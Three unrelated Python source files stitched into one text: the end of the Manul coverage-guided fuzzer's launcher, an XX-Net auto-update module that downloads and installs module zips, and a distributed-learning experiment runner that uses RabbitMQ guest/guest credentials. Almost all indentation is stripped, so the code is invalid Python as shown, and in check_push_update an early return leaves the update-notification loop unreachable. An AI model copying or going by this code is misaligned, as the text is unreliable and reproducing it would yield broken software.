if len(new_files) > 0:
self.list_of_files = self.list_of_files + new_files
self.fuzzer_stats.stats['files_in_queue'] = len(self.list_of_files)
self.update_stats()
end_time = timer() - start_time
self.fuzzer_stats.stats['exec_per_sec'] = self.fuzzer_stats.stats['executions'] / end_time
self.avg_exec_per_sec += int(self.fuzzer_stats.stats['exec_per_sec'] / cycle_id)
self.avg_bitmap_size += int(self.bitmap_size / cycle_id)
last_stats_saved_time += elapsed
if last_stats_saved_time > 1: # we save fuzzer stats per iteration or once per second to avoid huge stats files
self.save_stats()
last_stats_saved_time = 0
def get_bytes_covered(virgin_bits):
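    # The virgin bitmap starts out as all 0xFF; every byte that is no longer 0xFF has been hit by
    # at least one execution, so counting them gives the number of covered bitmap bytes.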
non_zeros = [x for x in virgin_bits if x != 0xFF]
return len(non_zeros)
def run_fuzzer_instance(files_list, i, virgin_bits, args, stats_array, restore_session,
crash_bits, dbi_setup, radamsa_path):
signal.signal(signal.SIGINT, signal.SIG_IGN)
printing.DEBUG_PRINT = args.debug # FYI, multiprocessing causes global vars to be reinitialized.
INFO(0, None, None, "Starting fuzzer %d" % i)
fuzzer_instance = Fuzzer(files_list, i, virgin_bits, args, stats_array, restore_session,
crash_bits, dbi_setup, radamsa_path)
fuzzer_instance.run() # never return
def check_instrumentation(target_binary):
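    # AFL-instrumented binaries embed the "__AFL_SHM_ID" string (the env var they read to attach
    # to the coverage bitmap); if it is missing the target was most likely built without instrumentation.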
with open(target_binary, 'rb') as f:
s = f.read()
res = s.find(b"__AFL_SHM_ID")
if res == -1:
return False
return True
def which(target_binary):
def is_binary(target_binary):
return os.path.isfile(target_binary) and os.access(target_binary, os.X_OK)
fpath, fname = os.path.split(target_binary)
if fpath:
if is_binary(target_binary):
return target_binary
else:
for path in os.environ["PATH"].split(os.pathsep):
exec_file = os.path.join(path, target_binary)
if is_binary(exec_file):
return exec_file
return None
def check_binary(target_binary):
binary_path = which(target_binary)
if binary_path is None:
ERROR("Unable to find binary %s (required)" % target_binary)
def get_available_id_for_backup(dir_name):
id = 0
tmp = dir_name + "_%d" % id
while True:
if not os.path.exists(tmp):
return id
id += 1
tmp = dir_name + "_%d" % id
def configure_dbi(args, target_binary, is_debug):
dbi_engine_path = args.dbi_root
dbi_tool_path = args.dbi_client_root
dbi_tool_libs = args.dbi_client_libs
if dbi_engine_path is None or dbi_tool_path is None:
ERROR("DBI_ROOT and/or DBI_CLIENT_ROOT paths not specified, unable to execute manul")
check_binary(dbi_engine_path)
check_binary(dbi_tool_path)
dbi_tool_params = ""
dbi_pipe_handler = None
if args.dbi == "dynamorio":
if args.dbi_persistence_mode >= 1:
if args.dbi_target_module:
dbi_tool_params += "-target_module %s " % args.dbi_target_module
if args.dbi_thread_coverage:
dbi_tool_params += "-thread_coverage"
if args.dbi_target_method:
dbi_tool_params += "-target_method %s " % args.dbi_target_method
elif args.dbi_target_offset:
dbi_tool_params += "-target_offset %s " % args.dbi_target_offset
else:
ERROR("Please specify target method or target offset in manul.config")
dbi_tool_params += "-fuzz_iterations %d " % args.dbi_fuzz_iterations
dbi_tool_params += "-persistence_mode %d " % args.dbi_persistence_mode
dbi_tool_params += "-coverage_module %s " % ntpath.basename(target_binary)
if dbi_tool_libs is not None:
for target_lib in dbi_tool_libs.split(","):
if target_lib == "":
continue
dbi_tool_params += "-coverage_module %s " % target_lib
if is_debug:
dbi_tool_params += "-debug_manul "
elif args.dbi == "pin":
if sys.platform == "win32":
ERROR("Intel PIN DBI engine is not supported on Windows")
if dbi_tool_libs is not None:
# adding desired libs to instrument
fd = open("dbi_config", 'w')
fd.write(dbi_tool_libs)
fd.close()
dbi_config_file_path = os.path.abspath("dbi_config")
dbi_tool_params += " -libs %s" % dbi_config_file_path
else:
ERROR("Unknown dbi engine/option specified. Intel PIN or DynamoRIO are only supported")
dbi_setup = (dbi_engine_path, dbi_tool_path, dbi_tool_params, dbi_pipe_handler)
return dbi_setup
def split_files_by_count(files_list, threads_count):
# split list of input files by fuzzer instances
less_files = False
if len(files_list) < threads_count:
less_files = True
WARNING(None, "Too many fuzzing instances for %d files, same files will be mutated with different seeds" % len(files_list))
files = [[] for x in xrange(threads_count)]
thread_index = 0
# if list of files is less than number of required threads we run our fuzzer with different seed on the same files
while thread_index < threads_count:
for i, file_name in enumerate(files_list):
if less_files and (thread_index + i) >= threads_count:
break
piece = (thread_index + i) % threads_count
files[piece].append(file_name)
thread_index += i + 1
return files
def get_files_list(path):
files_list = [f for f in listdir(path) if isfile(join(path, f))] # let's process input directory
files_list.sort()
if len(files_list) == 0:
ERROR("No files for fuzzing, exiting")
return files_list
def check_if_exist(files_list, path):
for file_name in files_list:
if file_name == "":
ERROR("File list has empty file name")
elif isfile(path + "/" + file_name):
continue
else:
ERROR("File %s doesn't exist in %s" % (file_name, path))
def allocate_files_per_jobs(args):
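    # Distribute the input corpus across fuzzing jobs: a slave asks the master for its file list,
    # a master splits the corpus between its own fuzzers and every remote slave thread and sends
    # each slave its slice, and a standalone instance simply splits the local corpus.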
if args.net_config_slave is not None:
files = manul_network.get_files_list_from_master(args.net_config_slave, args.nfuzzers) # ask master to provide list of files
check_if_exist(files, args.input)
return split_files_by_count(files, args.nfuzzers)
files_list = get_files_list(args.input)
if args.net_config_master is not None:
ips = manul_network.get_slaves_ips(args.net_config_master)
slaves, total_threads_count = manul_network.get_remote_threads_count(ips) # ask slaves count and threads
total_threads_count += args.nfuzzers
files = split_files_by_count(files_list, total_threads_count)
piece_id = 0
for ip, port, slave_threads_count in slaves:
manul_network.send_files_list(ip, port, files[piece_id:slave_threads_count + piece_id]) # send them files list
piece_id += slave_threads_count
files = files[piece_id:]
else:
files = split_files_by_count(files_list, args.nfuzzers)
return files
def enable_network_config(args):
if (args.target_ip_port and not args.target_protocol) or (args.target_protocol and not args.target_ip_port):
ERROR("Both target_ip_port and target_protocol should be specified")
if args.target_ip_port and not args.target_protocol:
ERROR("You need to provide target protocol (tcp or udp) in manul config along with ip and port")
if args.target_protocol and not args.target_ip_port:
ERROR("You need to provide target port and ip along with TCP/IP protocol in manul config")
if args.target_protocol and args.target_protocol != "tcp" and args.target_protocol != "udp":
ERROR("Invalid protocol. Should be tcp or udp.")
if args.target_ip_port and args.nfuzzers > 1:
ERROR("Multi-threaded network fuzzing is not supported, yet")
if args.target_ip_port:
target_ip_port = args.target_ip_port.split(":")
if len(target_ip_port) != 2:
ERROR("Invalid format for IP:PORT in manul config, received this: %s" % args.target_ip_port)
target_ip = target_ip_port[0]
if target_ip.count(".") != 3:
ERROR("Invalid IP format in %s" % target_ip)
target_port = target_ip_port[1]
if int(target_port) > 65535 or int(target_port) <= 0:
ERROR("Target port should be in range (0, 65535)")
def parse_args():
global INIT_WAIT_TIME
parser = argparse.ArgumentParser(prog = "manul.py",
description = 'Manul - coverage-guided parallel fuzzing for native applications.',
usage = '%(prog)s -i /home/user/inputs_dir -o /home/user/outputs_dir -n 40 "target -png @@"')
requiredNamed = parser.add_argument_group('Required parameters')
requiredNamed.add_argument('-i', required=True, dest='input', help = "Path to directory with initial corpus")
requiredNamed.add_argument('-o', dest='output', required=True, default="manul_output",
help = "Path to output directory")
parser.add_argument('-n', default=1, type=int, dest='nfuzzers', help = "Number of parallel fuzzers")
parser.add_argument('-s', default=False, action='store_true', dest="simple_mode",
help = "Run dumb fuzzing (no code instrumentation)")
parser.add_argument('-c', default="manul.config", dest = "config",
help = "Path to config file with additional options (see manul.config)")
parser.add_argument('-r', default=False, action='store_true', dest = "restore", help = "Restore previous session")
# these options should be specified through config file and hidden
parser.add_argument('--deterministic_seed', default=False, action='store_true', help = argparse.SUPPRESS)
parser.add_argument('--print_per_thread', default=False, action='store_true', dest="threads_info", help = argparse.SUPPRESS)
parser.add_argument('--dbi', default = None, help = argparse.SUPPRESS)
parser.add_argument('--dbi_root', help = argparse.SUPPRESS)
parser.add_argument('--dbi_client_root', help = argparse.SUPPRESS)
parser.add_argument('--dbi_client_libs', help = argparse.SUPPRESS)
parser.add_argument("--dbi_persistence_mode", default = 0, type=int, help = argparse.SUPPRESS)
parser.add_argument("--dbi_target_method", default = None, help = argparse.SUPPRESS)
parser.add_argument("--dbi_target_offset", default = None, help= argparse.SUPPRESS)
parser.add_argument("--dbi_target_module", default = None, help = argparse.SUPPRESS)
parser.add_argument("--dbi_fuzz_iterations", default = 5000, type=int, help = argparse.SUPPRESS)
parser.add_argument("--dbi_thread_coverage", default = False, action = 'store_true', help = argparse.SUPPRESS)
parser.add_argument('--timeout', default=10, type=int, help = argparse.SUPPRESS)
parser.add_argument('--net_config_master', help = argparse.SUPPRESS)
parser.add_argument('--net_config_slave', help = argparse.SUPPRESS)
parser.add_argument('--debug', default=False, action='store_true', help = argparse.SUPPRESS)
parser.add_argument('--manul_logo', default=False, action='store_true', help = argparse.SUPPRESS)
parser.add_argument('--logging_enable', default=False, action='store_true', help = argparse.SUPPRESS)
parser.add_argument('--sync_freq', default=1000000, type=int, help = argparse.SUPPRESS)
parser.add_argument('--cmd_fuzzing', default=False, action='store_true', help = argparse.SUPPRESS)
parser.add_argument('--target_ip_port', default = None, help = argparse.SUPPRESS)
parser.add_argument('--target_protocol', default = None, help = argparse.SUPPRESS)
parser.add_argument('--mutator_weights', default = None, help = argparse.SUPPRESS)
parser.add_argument('--user_signals', default = None, help = argparse.SUPPRESS)
parser.add_argument("--dict", default = None, help = argparse.SUPPRESS)
parser.add_argument("--restore", default = None, action = 'store_true', help = argparse.SUPPRESS)
parser.add_argument("--no_stats", default = None, action = "store_true", help = argparse.SUPPRESS)
parser.add_argument("--custom_path", default = None, help=argparse.SUPPRESS)
parser.add_argument("--init_wait", default = 0.0, help = argparse.SUPPRESS)
parser.add_argument("--net_sleep_between_cases", default = 0.0, help = argparse.SUPPRESS)
parser.add_argument("--disable_volatile_bytes", default = None, action = 'store_true', help = argparse.SUPPRESS)
parser.add_argument("--stop_after_nseconds", default = 0.0, type=int, help = argparse.SUPPRESS)
parser.add_argument("--forkserver_on", default = False, action = 'store_true', help = argparse.SUPPRESS)
parser.add_argument("--skip_binary_check", default = False, action = 'store_true', help = argparse.SUPPRESS)
parser.add_argument('target_binary', nargs='*', help="The target binary and options to be executed (quotes needed e.g. \"target -png @@\")")
args = parser.parse_args()
additional_args = parse_config(args.config)
    # A little hack here: we append the options from the config file to the command line string and then parse everything together.
final_cmd_to_parse = "%s %s" % (" ".join(sys.argv[1:-1]), additional_args)
final_cmd_to_parse = final_cmd_to_parse.split(" ")
final_cmd_to_parse.append("%s" % sys.argv[-1])
args = parser.parse_args(final_cmd_to_parse)
if args.manul_logo:
printing.print_logo()
if not args.target_ip_port and "@@" not in args.target_binary[0]:
ERROR("Your forgot to specify @@ for your target. Call manul.py -h for more details")
if args.simple_mode and args.dbi is not None:
ERROR("Options mismatch. Simple mode can't be executed with DBI mode together (check manul.config).")
if not args.mutator_weights:
ERROR("At least one mutator should be specified")
if args.custom_path and not os.path.isdir(args.custom_path):
ERROR("Custom path provided does not exist or not a directory")
enable_network_config(args)
if args.dict:
if not os.path.isfile(args.dict):
WARNING(None, "Unable to read dictionary file from %s, file doesn't exist" % args.dict)
if args.forkserver_on and not sys.platform.startswith('linux'):
INFO(0, None, None, "Forkserver is not supported on this platform, switching to classic mode")
args.forkserver_on = False
if args.simple_mode or args.dbi:
args.forkserver_on = False # we don't have forkserver for simple or DBI modes
#TODO: check that DBI params are correctly set
INIT_WAIT_TIME = float(args.init_wait)
return args
if __name__ == "__main__":
start = timer()
args = parse_args()
printing.DEBUG_PRINT = args.debug
binary_to_check = args.target_binary[0]
target_binary = split_unescape(binary_to_check, ' ', '\\')[0]
dbi_setup = None
if args.dbi is not None:
dbi_setup = configure_dbi(args, target_binary, args.debug)
if not args.skip_binary_check:
check_binary(target_binary) # check if our binary exists and is actually instrumented
if not args.simple_mode and args.dbi is None and not args.skip_binary_check and not check_instrumentation(target_binary):
ERROR("Failed to find afl's instrumentation in the target binary, try to recompile or run manul in dumb mode")
if not os.path.isdir(args.input):
ERROR("Input directory doesn't exist")
if not os.path.isdir(args.output):
ERROR("Output directory doesn't exist")
if args.output.endswith('/'):
args.output = args.output[:-1]
if args.input.endswith('/'):
args.input = args.input[:-1]
if not args.restore and os.listdir(args.output):
WARNING(None, "Output directory is not empty, creating backup of output folder")
id = get_available_id_for_backup(args.output)
os.rename(args.output, args.output + "_%d" % id)
os.mkdir(args.output)
INFO(0, None, None, "Done")
# if radamsa weight is not zero, check that we can actually execute it
radamsa_path = None
if "radamsa:0" not in args.mutator_weights:
#get relative path to radamsa binary
radamsa_path = __file__
radamsa_path = radamsa_path.replace("manul.py", "")
if sys.platform == "win32":
radamsa_path = radamsa_path + "radamsa.exe"
elif sys.platform == "darwin":
radamsa_path = "radamsa"
else:
radamsa_path = radamsa_path + "./libradamsa/libradamsa.so"
INFO(1, None, None, "Full relative path to radamsa %s" % radamsa_path)
check_binary(radamsa_path)
files = allocate_files_per_jobs(args)
virgin_bits = None
crash_bits = None
if not args.simple_mode:
virgin_bits = multiprocessing.Array("i", SHM_SIZE)
crash_bits = multiprocessing.Array("i", SHM_SIZE)
for i in range(0, SHM_SIZE):
virgin_bits[i] = 255 # initializing with all 0xFFs
crash_bits[i] = 255
# allocating data structures where we store all statistics about our fuzzers
stats = FuzzerStats()
all_threads_stats = list()
all_threads_handles = list()
for i, files_piece in enumerate(files):
stats_array = multiprocessing.Array("d", stats.get_len())
t = multiprocessing.Process(target=run_fuzzer_instance, args=(files_piece, i, virgin_bits, args, stats_array,
args.restore, crash_bits, dbi_setup, radamsa_path))
t.start()
all_threads_stats.append(stats_array)
all_threads_handles.append(t)
INFO(0, None, None, "%d fuzzer instances successfully launched" % args.nfuzzers)
sync_t = None
if (args.net_config_slave is not None or args.net_config_master is not None) and not args.simple_mode:
INFO(1, None, None, "Allocating special thread for bitmap synchronization")
ips = None
if args.net_config_master is not None:
ips = manul_network.get_slaves_ips(args.net_config_master)
sync_t = threading.Thread(target=manul_network.sync_remote_bitmaps,
args=(virgin_bits, ips))
elif args.net_config_slave is not None:
sync_t = threading.Thread(target=manul_network.receive_bitmap_slave,
args=(args.net_config_slave, virgin_bits))
sync_t.setDaemon(True)
sync_t.start()
if not PY3 and not args.target_ip_port and not args.forkserver_on:
watchdog_t = threading.Thread(target=watchdog, args=(args.timeout,))
watchdog_t.setDaemon(True)
watchdog_t.start()
try:
while True:
threads_inactive = 0
for i, t in enumerate(all_threads_handles):
if not t.is_alive():
threads_inactive += 1
WARNING(None, "Fuzzer %d unexpectedly terminated" % i)
            if sync_t is not None and not sync_t.is_alive():
WARNING(None, "Synchronization thread is not alive")
end = timer() - start
bytes_cov = 0.0
if not args.simple_mode:
bytes_cov = get_bytes_covered(virgin_bits)
active_threads_count = len(all_threads_handles) - threads_inactive
# printing statistics
if args.threads_info:
printing.print_per_thread(all_threads_stats, bytes_cov, end, active_threads_count, args, args.mutator_weights)
else:
printing.print_summary(all_threads_stats, bytes_cov, end, active_threads_count, args, UPDATE, args.mutator_weights)
if args.stop_after_nseconds != 0.0 and args.stop_after_nseconds < end:
INFO(0, None, None, "Stopping manul due to stop_after_nseconds option %d" % end)
#kill_all(os.getpid())
sys.exit(0)
time.sleep(STATS_FREQUENCY)
except (KeyboardInterrupt, SystemExit):
INFO(0, None, None, "Stopping all fuzzers and threads")
kill_all(os.getpid())
# TODO: ideally, if we have UDS opened we should clean them with unlink() function here.
INFO(0, None, None, "Stopped, exiting")
sys.exit()
|
update.py
|
#!/usr/bin/env python
# coding:utf-8
import os
import urllib2
import json
import time
import threading
import zipfile
import sys
import platform
from distutils.version import LooseVersion
from instances import xlog
import config
import uuid
import update_from_github
#opener = urllib2.build_opener()
#update_url = "http://127.0.0.1:8080/update.json"
update_url = "https://xxnet-update.appspot.com/update.json"
update_content = ""
update_dict = {}
new_gae_proxy_version = ""
gae_proxy_path = ""
current_path = os.path.dirname(os.path.abspath(__file__))
root_path = os.path.abspath( os.path.join(current_path, os.pardir))
data_root = os.path.join(root_path, 'data')
def get_opener():
autoproxy = '127.0.0.1:8087'
import ssl
if getattr(ssl, "create_default_context", None):
cafile = os.path.join(data_root, "gae_proxy", "CA.crt")
if not os.path.isfile(cafile):
cafile = None
context = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH,
cafile=cafile)
https_handler = urllib2.HTTPSHandler(context=context)
opener = urllib2.build_opener(urllib2.ProxyHandler({'http': autoproxy, 'https': autoproxy}), https_handler)
else:
opener = urllib2.build_opener(urllib2.ProxyHandler({'http': autoproxy, 'https': autoproxy}))
return opener
def version_to_bin(s):
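    # Pack a dotted version string into one integer, e.g. "3.2.1" -> 0x030201, so versions can be
    # compared numerically.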
return reduce(lambda a, b: a << 8 | b, map(int, s.split(".")))
def download_file(url, file):
try:
xlog.info("download %s to %s", url, file)
opener = get_opener()
        req = opener.open(url)
CHUNK = 16 * 1024
with open(file, 'wb') as fp:
while True:
chunk = req.read(CHUNK)
if not chunk: break
fp.write(chunk)
return True
except:
xlog.info("download %s to %s fail", url, file)
return False
def sha1_file(filename):
import hashlib
BLOCKSIZE = 65536
hasher = hashlib.sha1()
try:
with open(filename, 'rb') as afile:
buf = afile.read(BLOCKSIZE)
while len(buf) > 0:
hasher.update(buf)
buf = afile.read(BLOCKSIZE)
return hasher.hexdigest()
except:
return False
def install_module(module, new_version):
import module_init
import os, subprocess, sys
current_path = os.path.dirname(os.path.abspath(__file__))
new_module_version_path = os.path.abspath( os.path.join(current_path, os.pardir, os.pardir, module, new_version))
#check path exist
if not os.path.isdir(new_module_version_path):
xlog.error("install module %s dir %s not exist", module, new_module_version_path)
return
#call setup.py
setup_script = os.path.join(new_module_version_path, "setup.py")
if not os.path.isfile(setup_script):
xlog.warn("update %s fail. setup script %s not exist", module, setup_script)
return
config.set(["modules", module, "current_version"], str(new_version))
config.save()
if module == "launcher":
module_init.stop_all()
import web_control
web_control.stop()
subprocess.Popen([sys.executable, setup_script], shell=False)
os._exit(0)
else:
xlog.info("Setup %s version %s ...", module, new_version)
try:
module_init.stop(module)
subprocess.call([sys.executable, setup_script], shell=False)
xlog.info("Finished new version setup.")
xlog.info("Restarting new version ...")
module_init.start(module)
except Exception as e:
xlog.error("install module %s %s fail:%s", module, new_version, e)
def download_module(module, new_version):
import os
global update_content, update_dict
current_path = os.path.dirname(os.path.abspath(__file__))
download_path = os.path.abspath( os.path.join(current_path, os.pardir, os.pardir, 'data', 'downloads'))
if not os.path.isdir(download_path):
os.mkdir(download_path)
try:
for source in update_dict["modules"][module]["versions"][new_version]["sources"]:
url = source["url"]
filename = module + "-" + new_version + ".zip"
file_path = os.path.join(download_path, filename)
if os.path.isfile(file_path) and sha1_file(file_path) == update_dict["modules"][module]["versions"][new_version]["sha1"]:
pass
elif not download_file(url, file_path):
xlog.warn("download %s fail", url)
continue
sha1 = sha1_file(file_path)
if update_dict["modules"][module]["versions"][new_version]["sha1"] != sha1:
xlog.warn("download %s sha1 wrong", url)
continue
module_path = os.path.abspath( os.path.join(current_path, os.pardir, os.pardir, module))
if not os.path.isdir(module_path):
                os.mkdir(module_path, 0o755)
version_path = os.path.join(module_path, new_version)
if os.path.isdir(version_path):
xlog.error("module dir exist:%s, download exist.", version_path)
return
with zipfile.ZipFile(file_path, "r") as dz:
dz.extractall(module_path)
dz.close()
import shutil
unzip_path = os.path.abspath(os.path.join(module_path, module + "-" + new_version))
tag_path = os.path.abspath(os.path.join(module_path, new_version))
shutil.move(unzip_path, tag_path)
msg = "Module %s new version %s downloaded, Install?" % (module, new_version)
if sys.platform == "linux" or sys.platform == "linux2":
from gtk_tray import sys_tray
data_install = "%s|%s|install" % (module, new_version)
data_ignore = "%s|%s|ignore" % (module, new_version)
buttons = {1: {"data":data_install, "label":"Install", 'callback':general_gtk_callback},
2: {"data":data_ignore, "label":"Ignore", 'callback':general_gtk_callback}}
sys_tray.notify_general(msg=msg, title="Install", buttons=buttons)
elif sys.platform == "win32":
from win_tray import sys_tray
if sys_tray.dialog_yes_no(msg, u"Install", None, None) == 1:
install_module(module, new_version)
else:
ignore_module(module, new_version)
elif sys.platform == "darwin":
from mac_tray import sys_tray
if sys_tray.presentAlert_withTitle_(msg, "Install"):
install_module(module, new_version)
else:
ignore_module(module, new_version)
else:
install_module(module, new_version)
break
except Exception as e:
xlog.warn("get gae_proxy source fail, content:%s err:%s", update_content, e)
def ignore_module(module, new_version):
config.set(["modules", module, "ignore_version"], str(new_version))
config.save()
def general_gtk_callback(widget=None, data=None):
args = data.split('|')
if len(args) != 3:
xlog.error("general_gtk_callback data:%s", data)
return
module = args[0]
new_version = args[1]
action = args[2]
if action == "download":
download_module(module, new_version)
elif action == "install":
install_module(module, new_version)
elif action == "ignore":
ignore_module(module, new_version)
def check_update():
try:
update_rule = config.get(["update", "check_update"], "stable")
if update_rule == "dont-check":
return
check_push_update()
if update_rule != "stable" and update_rule != "test":
return
versions = update_from_github.get_github_versions()
current_version = update_from_github.current_version()
if update_rule == "test":
if LooseVersion(current_version) < LooseVersion(versions[0][1]):
xlog.info("update to test version %s", versions[0][1])
update_from_github.update_version(versions[0][1])
elif update_rule == "stable":
if LooseVersion(current_version) < LooseVersion(versions[1][1]):
xlog.info("update to stable version %s", versions[1][1])
update_from_github.update_version(versions[1][1])
except IOError as e:
xlog.warn("check update fail:%r", e)
except Exception as e:
xlog.exception("check_update fail:%r", e)
def check_push_update():
global update_content, update_dict
try:
opener = get_opener()
req_url = update_url + "?uuid=" + get_uuid() \
+ "&version=" + update_from_github.current_version() \
+ "&platform=" + platform.platform()
try:
update_content = opener.open(req_url).read()
except Exception as e:
xlog.warn("check_update fail:%r", e)
return False
update_dict = json.loads(update_content)
return True
for module in update_dict["modules"]:
new_version = str(update_dict["modules"][module]["last_version"])
describe = update_dict["modules"][module]["versions"][new_version]["describe"]
if update_dict["modules"][module]["versions"][new_version]["notify"] != "true":
continue
            if module not in config.config["modules"]:
                ignore_version = '0.0.0'
                current_version = '0.0.0'
                config.config["modules"][module] = {}
                config.config["modules"][module]["current_version"] = '0.0.0'
else:
current_version = config.get(["modules", module, "current_version"])
if "ignore_version" in config.config["modules"][module]:
ignore_version = config.config["modules"][module]["ignore_version"]
else:
ignore_version = current_version
if version_to_bin(new_version) <= version_to_bin(ignore_version):
continue
if version_to_bin(new_version) > version_to_bin(current_version):
xlog.info("new %s version:%s", module, new_version)
if sys.platform == "linux" or sys.platform == "linux2":
from gtk_tray import sys_tray
msg = "Module %s new version: %s, Download?\nNew:%s" % (module, new_version, describe)
data_download = "%s|%s|download" % (module, new_version)
data_ignore = "%s|%s|ignore" % (module, new_version)
buttons = {1: {"data":data_download, "label":"Download", 'callback':general_gtk_callback},
2: {"data":data_ignore, "label":"Ignore", 'callback':general_gtk_callback}}
sys_tray.notify_general(msg=msg, title="New Version", buttons=buttons)
elif sys.platform == "win32":
from win_tray import sys_tray
msg = "Module %s new version: %s, Download?" % (module, new_version)
if sys_tray.dialog_yes_no(msg, u"Download", None, None) == 1:
download_module(module, new_version)
else:
ignore_module(module, new_version)
elif sys.platform == "darwin":
from mac_tray import sys_tray
msg = "Module %s new version: %s, Download?" % (module, new_version)
if sys_tray.presentAlert_withTitle_(msg, "Download"):
download_module(module, new_version)
else:
ignore_module(module, new_version)
else:
download_module(module, new_version)
except Exception as e:
xlog.exception("check_update except:%s", e)
return
def create_desktop_shortcut():
import sys
if sys.platform.startswith("linux"):
pass
elif sys.platform == "win32":
# import ctypes
        # msg = u"Create a desktop shortcut?"
# title = u"XX-Net 叉叉网"
#res = ctypes.windll.user32.MessageBoxW(None, msg, title, 1)
# Yes:1 No:2
#if res == 2:
# return
work_path = os.path.dirname(os.path.abspath(__file__))
os.chdir(work_path)
import subprocess
subprocess.call(["Wscript.exe", "//E:JScript", "create_shortcut.js"], shell=False)
def notify_install_tcpz_for_winXp():
import ctypes
    ctypes.windll.user32.MessageBoxW(None, u"Please patch tcpip.sys with tcp-z to lift the concurrent connection limit!", u"Patch XP needed", 0)
def check_new_machine():
current_path = os.path.dirname(os.path.abspath(__file__))
if current_path != config.get(["update", "last_path"], ""):
config.set(["update", "last_path"], current_path)
config.save()
if sys.platform == "win32" and platform.release() == "XP":
notify_install_tcpz_for_winXp()
xlog.info("generate desktop shortcut")
create_desktop_shortcut()
def check_loop():
check_new_machine()
#wait gae_proxy to start
#update need gae_proxy as proxy
time.sleep(1)
while True:
check_update()
time.sleep(3600 * 24)
def start():
p = threading.Thread(target=check_loop)
p.setDaemon(True)
p.start()
def need_new_uuid():
if not config.get(["update", "uuid"]):
xlog.info("need_new_uuid: uuid is empty")
return True
return False
def generate_new_uuid():
xx_net_uuid = str(uuid.uuid4())
config.set(["update", "uuid"], xx_net_uuid)
xlog.info("generate uuid:%s", xx_net_uuid)
config.save()
def get_uuid():
if need_new_uuid():
generate_new_uuid()
xx_net_uuid = config.get(["update", "uuid"])
xlog.info("get uuid:%s", xx_net_uuid)
return xx_net_uuid
if __name__ == "__main__":
#get_uuid()
#check_update()
#sys_tray.serve_forever()
create_desktop_shortcut()
|
experiment.py
|
from multiprocessing import Process
from DLplatform.coordinator import Coordinator, InitializationHandler
from DLplatform.worker import Worker
from DLplatform.communicating import Communicator, RabbitMQComm
from DLplatform.dataprovisioning import IntervalDataScheduler
from DLplatform.learningLogger import LearningLogger
from DLplatform.learning import LearnerFactory
import time
import os
import pickle
import numpy as np
import math
import subprocess
class Experiment():
def __init__(self, executionMode, messengerHost, messengerPort, numberOfNodes, sync, aggregator, learnerFactory, dataSourceFactory, stoppingCriterion, initHandler = InitializationHandler(), sleepTime = 5):
self.executionMode = executionMode
if executionMode == 'cpu':
self.devices = None
self.modelsPer = None
else:
self.devices = []
if os.environ.get('CUDA_VISIBLE_DEVICES') is None:
gpuIds = range(str(subprocess.check_output(["nvidia-smi", "-L"])).count('UUID'))
else:
gpuIds = os.environ.get('CUDA_VISIBLE_DEVICES').split(',')
for taskid in gpuIds:
self.devices.append('cuda:' + str(taskid))
self.modelsPer = math.ceil(numberOfNodes * 1.0 / len(self.devices))
print(self.modelsPer, "models per gpu on", ','.join(self.devices))
self.messengerHost = messengerHost
self.messengerPort = messengerPort
self.numberOfNodes = numberOfNodes
self.sync = sync
self.aggregator = aggregator
self.learnerFactory = learnerFactory
self.dataSourceFactory = dataSourceFactory
self.stoppingCriterion = stoppingCriterion
self.initHandler = initHandler
self._uniqueId = str(os.getpid())
self.sleepTime = sleepTime
def run(self, name):
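        # Create the experiment output directory, start the coordinator in its own process, then
        # spawn one worker process per node (pausing sleepTime between starts) and wait for all of
        # them to finish.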
self.start_time = time.time()
exp_path = name + "_" + self.getTimestamp()
os.mkdir(exp_path)
self.writeExperimentSummary(exp_path, name)
t = Process(target = self.createCoordinator, args=(exp_path, ), name = 'coordinator')
#t.daemon = True
t.start()
jobs = [t]
time.sleep(self.sleepTime)
for taskid in range(self.numberOfNodes):
t = Process(target = self.createWorker, args=(taskid, exp_path, self.executionMode, self.devices, self.modelsPer, ), name = "worker_" + str(taskid))
#t.daemon = True
t.start()
jobs.append(t)
time.sleep(self.sleepTime)
for job in jobs:
job.join()
print('experiment done.')
def createCoordinator(self, exp_path):
coordinator = Coordinator()
coordinator.setInitHandler(self.initHandler)
comm = RabbitMQComm(hostname = self.messengerHost, port = self.messengerPort, user = 'guest', password = 'guest', uniqueId = self._uniqueId)
os.mkdir(os.path.join(exp_path,'coordinator'))
commLogger = LearningLogger(path=os.path.join(exp_path,'coordinator'), id="communication", level = 'INFO')
comm.setLearningLogger(commLogger)
coordinator.setCommunicator(comm)
self.sync.setAggregator(self.aggregator)
coordinator.setSynchronizer(self.sync)
logger = LearningLogger(path=exp_path, id="coordinator", level = 'INFO')
coordinator.setLearningLogger(logger)
print("Starting coordinator...\n")
coordinator.run()
def createWorker(self, id, exp_path, executionMode, devices, modelsPer):
print("start creating worker" + str(id))
if executionMode == 'cpu':
device = None
else:
print("device for node", id, "is gpu", id//modelsPer)
device = devices[id//modelsPer]
nodeId = str(id)
w = Worker(nodeId)
dataScheduler = IntervalDataScheduler()
dataSource = self.dataSourceFactory.getDataSource(nodeId = id)
dataScheduler.setDataSource(source = dataSource)
w.setDataScheduler(dataScheduler)
comm = RabbitMQComm(hostname = self.messengerHost, port = self.messengerPort, user = 'guest', password = 'guest', uniqueId = self._uniqueId)
os.mkdir(os.path.join(exp_path,"worker" + str(id)))
commLogger = LearningLogger(path=os.path.join(exp_path,"worker" + str(id)), id="communication", level = 'INFO')
comm.setLearningLogger(commLogger)
w.setCommunicator(comm)
logger = LearningLogger(path=exp_path, id="worker" + str(id), level = 'INFO')
learner = self.learnerFactory.getLearnerOnDevice(executionMode, device)
learner.setLearningLogger(logger)
learner.setStoppingCriterion(self.stoppingCriterion)
self.sync.setAggregator(self.aggregator)
learner.setSynchronizer(self.sync)
w.setLearner(learner)
print("create worker " + nodeId + "\n")
w.run()
def getTimestamp(self):
return time.strftime("%Y-%m-%d_%H-%M-%S", time.localtime(time.time()))
def writeExperimentSummary(self, path, name):
outString = "Experiment " + name + " Summary:\n\n"
outString += "Start:\t" + str(self.start_time) + "\n"
outString += "Number of Nodes:\t"+str(self.numberOfNodes)+"\n"
outString += "Learner:\t\t\t"+str(self.learnerFactory)+"\n"
outString += "Data source:\t\t"+str(self.dataSourceFactory)+"\n"
outString += "Sync:\t\t\t"+str(self.sync)+"\n"
outString += "Aggregator:\t\t"+str(self.aggregator)+"\n"
outString += "Stopping criterion:\t"+str(self.stoppingCriterion)+"\n"
outString += "Messenger Host:\t\t"+str(self.messengerHost)+"\n"
outString += "Messenger Port:\t\t"+str(self.messengerPort)+"\n"
summaryFile = os.path.join(path, "summary.txt")
f = open(summaryFile, 'w')
f.write(outString)
f.close()
|
